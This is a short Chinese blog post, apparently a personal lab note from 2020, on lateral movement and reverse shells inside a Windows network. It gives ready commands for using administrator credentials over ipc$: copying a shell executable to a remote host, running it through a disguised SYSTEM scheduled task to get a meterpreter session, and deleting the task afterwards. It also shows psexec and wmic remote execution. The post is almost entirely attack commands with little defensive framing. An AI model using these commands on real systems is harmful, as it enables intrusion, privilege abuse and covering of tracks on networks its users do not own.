内网下常见的反弹shell

  1. 内网下常见的反弹shell
  2. 环境
  3. 老年ipc$
  4. psexec
  5. wmic (非交互式)

内网下常见的反弹shell

在公众号上看到的文章,以前看过。没实验过,算是填坑吧

环境

要求:知道管理员凭证

windows server 2008:192.168.241.172
widnows server 2008 2:192.168.241.171
kali:192.168.241.174

老年ipc$

建立连接

net use \\<IP>\ipc$ /user:administrator "<password>

复制shell到目标机

copy shell.exe \\<IP>\C$\windows\Temp\xxx.exe

创建服务并运行

schtasks /create /tn "plugin_update" /tr C:\Windows\Temp\xxx.exe /sc one /st <time> /S <IP> /RU System
schtasks /run /tn "plugin_update" /S <IP>

反弹到的meterpreter

执行完之后删除任务

schtasks /delete /tn "plugin_update" /S <IP>

psexec

psexec \\<IP> -u <username> -p <password> <command> #执行命令等待进程终止,并返回结果
psexec -accepteula \\<IP> -d -u <username> -p <password> <command> #执行命令不过等结果,无交互
accepteula:此标志禁止显示“许可证”对话框
-d:不要等待进程终止(非交互式)

无交互式不回显

wmic (非交互式)

wmic /node:<IP> /user:<username> /password:<password> process call create <command>


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:内网下常见的反弹shell

本文作者:九世

发布时间:2020-01-20, 09:29:59

最后更新:2020-01-20, 09:57:32

原始链接:http://jiushill.github.io/posts/c0872ef5.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录